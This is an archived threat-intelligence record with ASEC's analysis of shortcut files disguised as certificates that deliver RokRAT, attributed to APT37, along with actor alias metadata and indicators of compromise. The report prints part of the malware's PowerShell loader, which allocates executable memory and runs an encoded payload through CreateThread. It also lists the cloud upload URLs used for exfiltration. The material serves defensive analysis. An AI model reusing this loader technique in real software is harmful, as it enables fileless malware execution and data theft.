{ "id": "7ea3c216-00d8-4eb2-8776-09fd81ca4827", "created_at": "2026-04-06T00:22:19.079616Z", "updated_at": "2026-04-10T03:38:06.607027Z", "deleted_at": null, "sha1_hash": "05577b80c2a6a8dc731116ca46f868db35bc8ba9", "title": "LNK File Disguised as Certificate Distributing RokRAT Malware - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1659928, "plain_text": "LNK File Disguised as Certificate Distributing RokRAT Malware -\r\nASEC\r\nBy ATCP\r\nPublished: 2024-04-22 · Archived: 2026-04-05 18:09:09 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK)\r\nof abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are\r\nfound to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file\r\nnames are as follows:\r\nNational Information Academy 8th Integrated Course Certificate (Final).lnk\r\nGate access roster 2024.lnk\r\nNortheast Project (US Congressional Research Service (CRS Report).lnk\r\nFacility list.lnk\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 1 of 7\n\nThe confirmed LNK files contain a command to execute PowerShell via CMD, and their type is similar to the type\r\nfound in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)” [1] posted last\r\nyear. A notable fact about this type is that it includes legitimate document files, script code, and malicious PE data\r\ninside the LNK files.\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 2 of 7\n\nThe simplified operation process of the malware is as shown below.\r\nWhen the LNK file is executed, it runs PowerShell commands to create and execute a legitimate document file.\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 3 of 7\n\nAfterward, it creates 3 files in the %public% folder. The names and features of the files created in this step are as\r\nfollows.\r\nFile name Location in LNK File Feature\r\nviewer.dat 0x2BC97 (size:0xD9402) Encoded RokRAT malware\r\nsearch.dat 0x105099 (size:0x5AA) Executes viewer.dat file\r\nfind.bat 0x105643 (size:0x139) Executes search.dat file\r\nTable 1. List of created files\r\nThe first executed item is “find.bat”, which runs “search.dat” via PowerShell. “search.dat” reads the “viewer.dat”\r\nfile and executes it in a fileless manner.\r\n$exePath=$env:public+'\\'+'viewer.dat';\r\n$exeFile = Get-Content -path $exePath -encoding byte;\r\n[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);\r\n$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34\r\n\u003c중략\u003e\r\n$byteCount = $exeFile.Length;\r\n$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);\r\n$old = 0;\r\n$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 4 of 7\n\nfor($i = 0;$i -lt $byteCount;$i++) {\r\n[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };\r\n$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);\r\n$fried3sd23::WaitForSingleObject($handle, 500 * 1000);\r\nThe data of “viewer.dat” that is ultimately executed is the RokRAT malware, which is a backdoor-type malware\r\ncapable of utilizing cloud APIs to collect user information and perform various malicious behaviors at the threat\r\nactor’s command.\r\nThe collected information is transmitted to the threat actor’s cloud server using cloud services such as pCloud,\r\nYandex, and DropBox. At this point, the UserAgent in the request header is disguised as Googlebot, and the cloud\r\nURLs used are as follows in the table below.\r\nUser-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\nCloud URL\r\nPcloud(Down)\r\nhttps://api.pcloud.com/getfilelink?\r\npath=%s\u0026forcedownload=1\u0026skipfilename=1\r\nPcloud(up)\r\nhttps://api.pcloud.com/uploadfile?\r\npath=%s\u0026filename=%s\u0026nopartial=1\r\nYandex(Down) https://cloud-api.yandex.net/v1/disk/resources/download?path=%s\r\nYandex(up)\r\nhttps://cloud-api.yandex.net/v1/disk/resources/upload?\r\npath=%s\u0026overwrite=%s\r\nDropBox(Down) https://content.dropboxapi.com/2/files/download\r\nDropBox(up) https://content.dropboxapi.com/2/files/upload\r\nTable 2. Details on the cloud URLs used\r\nThe malicious behaviors that can be executed according to the threat actor’s command include:\r\nExecution of cmd commands\r\nCollection of directory listings\r\nDeletion of specific files (with VBS, CMD, BAT, and LNK extensions) within the Startup folder\r\nCollection of Startup folder listings, %APPDATA% folder listings, and recently used file listings\r\nCollection of PC information (system information, IP, router information, etc.)\r\nAdditionally, various other malicious behaviors can be performed, and the collected information is stored in the\r\n%TEMP% folder before being uploaded to the threat actor’s cloud server. The email addresses of the threat actor\r\nidentified during the analysis process are as follows.\r\ntanessha.samuel@gmail[.]com\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 5 of 7\n\ntianling0315@gmail[.]com\r\nw.sarah0808@gmail[.]com\r\nsoftpower21cs@gmail[.]com\r\nThrough its blog, ASEC has been consistently sharing information about the distribution of malicious shortcut file\r\ndue to the frequent occurrence of such incidents. In particular, malware aimed at individuals associated with\r\nKorean unification, military, and education has been continuously identified since the past, highlighting the need\r\nfor extra caution.\r\n[File Detection]\r\nDropper/LNK.S2343 (2024.04.12.03)\r\nTrojan/BAT.Runner (2024.04.12.00)\r\nTrojan/Script.Generic (2024.04.12.00)\r\nData/BIN.EncPe (2024.04.12.00)\r\nInfostealer/Win.Agent.R579429 (2023.05.05.01)\r\nMD5\r\n3114a3d092e269128f72cfd34812ddc8\r\n35441efd293d9c9fb4788a3f0b4f2e6b\r\n358122718ba11b3e8bb56340dbe94f51\r\n68386fa9933b2dc5711dffcee0748115\r\n6e5e5ec38454ecf94e723897a42450ea\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 6 of 7\n\nSource: https://asec.ahnlab.com/en/65076/\r\nhttps://asec.ahnlab.com/en/65076/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/65076/" ], "report_names": [ "65076" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434939, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/05577b80c2a6a8dc731116ca46f868db35bc8ba9.pdf", "text": "https://archive.orkl.eu/05577b80c2a6a8dc731116ca46f868db35bc8ba9.txt", "img": "https://archive.orkl.eu/05577b80c2a6a8dc731116ca46f868db35bc8ba9.jpg" } }